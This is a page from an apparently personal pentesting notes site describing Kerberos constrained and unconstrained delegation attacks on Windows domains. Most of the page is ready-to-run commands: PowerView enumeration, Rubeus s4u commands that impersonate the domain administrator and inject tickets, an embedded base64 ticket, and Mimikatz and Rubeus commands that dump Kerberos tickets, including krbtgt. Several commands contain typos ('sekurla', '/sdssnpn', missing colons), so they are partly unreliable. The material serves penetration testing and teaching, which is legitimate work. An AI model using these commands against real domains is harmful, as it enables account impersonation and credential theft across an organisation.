Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
        • MFASweep
        • GraphRunner
        • Azure SQL databases
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • Constrained delegation
  • Enumerate constrained delegation
  • Exploit with Rubeus
  • Unconstrained delegation
  • Get unconstrained delegation machines
  • Get tickets
  1. Windows Pentesting

Delegation attacks

Constrained delegation

If you have compromised a user account or a computer (machine account) that has kerberos constrained delegation enabled, it's possible to impersonate any domain user (including administrator) and authenticate to a service that the user account is trusted to delegate to.

Enumerate constrained delegation

Get-DomainUser -TrustedToAuth

Get-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo

Exploit with Rubeus

.\Rubeus.exe hash /password:<password>
.\Rubeus.exe asktgt /user:<user> /domain<domain> /aes256<AES hash>
.\Rubeus.exe s4u /ticket:<ticket> /impersonateuser<admininistrator> /sdssnpn:<spn_constrained> /altservice:HTTP /ptt

Example:

.\Rubeus.exe s4u /user:MS02$ /rc4:dc7a49c0c36399ae87f3de623ebab985 /impersonateuser:administrator /msdsspn:"cifs/domain.com" /altservice:cifs,host /ptt

Example with base64 ticket:

# Save TGS to file
Rubeus.exe s4u /ticket:+lhggPlMIID4aADAgEFoQsbCU0zQy5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJTTNDLkxPQ0FMo4IDqzCCA6egAwIBEqEDAgEEooIDmQSCA5XpEbxe5LARdWtJ362bAz7urCoUN79UNz23AfuY1LhR+T+bG06uGgSzKSXWUYZ3txMtkG3RpMnnA9zPhE8sLNNr29rMuH2NuJAF0flo/k/FZltiTTXMgvkHRPXvSdXlxAWxRm3+UXUpkccKXy7xbnvf3Y9Faalkb+Z6aLplOpU1Ef8/ZKMPwae+G5ua4hClYLYD+EaaxcDmvTwwtdxNYkCHbK4ix5XEik7IzctjoBoFlPoaryVoKvBPs4s3WluM0ZUjurT51/dqSo3AjkjSP5UTzsyIzz6RsqOSfGuR4D5WjTozz8ul2pLmexMVqU7vYZrg/VjoANNIOFrpAMXKX2ZCJp8IDVL8T+3k1cb3J5utKXcye3eH9odnUHZoXuker3KGl9A9f87p+quJwl8rXphOd5rG1G6wY5D+gYBjvTVRPio+z69FRcYKgZkSQBk3vzHpiB49wnwyktBBv/R2NzgwA2zCXqHqz5RgdnhZfkDSvR5/XET42DDfShvOkIq+YOFAlgZWuFrBw0TBoqfM4qazqYcSrH8nqVnQeKbPyLQHJO0gg6h1+71aoDaNfOSHUqtOTQtIeCbmq3OBm11JsJxfmpoozfZ1fqLiJ/Rz/iJBLLa3RKCERwiMGlLSdBk7ZBJjPmdrKhJ4jrldMP7XdeDuNMIXi9bnz7OfsyBvlf0Ve9fb3LaIrbsaCXnV7AjP6DB4MygIdMIwFJ5uo45KerdoY9ArYHrTeVwElg+87YgU0Okfdicsg4Zl8a3v1E2gSGQdz22zoEKWas4NW01mBTYdqFU0NG/GPUh/GhwC1sF76EomxbJL0MdDBLA0DJ3Ox50Wclvw70+VIa9uQyb56EZQcL8rmugA8+gAtii1TRPl4ILk86lMt+7qTPulUh1g23J32bh2KFzfEyhbt6Uj7ry5CufdhkeaLSncfuQjcSA1B3HD3lYGljZxZ+XrcF2Y7d3/2zlBY3VEDTmXre02ef8tq9kwVa220NT7EIXGOfOntcrMBaAyzZG6SMKI+AAo1PuPx/6ifo6TZ8tlGxWHlBly+UvNnittH41RW3Ipz8xwd26J1qpV2zN5JRu1gAcuEtUGNTKaJ65Z9jstrqxGtyTV7/e3aYm+ghfaQCh1wONp2HpB7DHtjoQIJOE9gidSkr1n36OuVsUdP9uBi9lA/Z7GdkckPoSaVvpdAgqczQrVfjKskdPjixJ6A2Dp/AnaleI2cetnuaOB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEIGTh+kKtVOKoRgEb76oda8NoIKz5haFB6CNC6DJH54FOoQsbCU0zQy5MT0NBTKIUMBKgAwIBAaELMAkbB00zU1FMVySjBwMFAGChAAClERgPMjAyMzEwMjcxMjM2NTlaphEYDzIwMjMxMDI3MjIxODU4WqcRGA8yMDIzMTEwMzAyMzQxNVqoCxsJTTNDLkxPQ0FMqR4wHKADAgECoRUwExsGa3JidGd0GwlNM0MuTE9DQUw= /impersonateuser:Micheal.Crosley /domain:m3c.local /msdsspn:"time/m3webaw" /altservice:http /outfile:TGS_micheal_TIMER

After saving the ticket you can load it manually in memory with:

Rubeus.exe ptt /ticket:path_to_ticket

Unconstrained delegation

Get unconstrained delegation machines

  • BloodHound will list this too

Get-NetComputer -Unconstrained

Get tickets

.\mimikatz.exe "sekurla::tickets /export" exit
.\Rubeus.exe dump /service:krbtgt /nowrap

PreviousCertificate Authority (CA)NextAttacking Kerberos

Last updated 6 months ago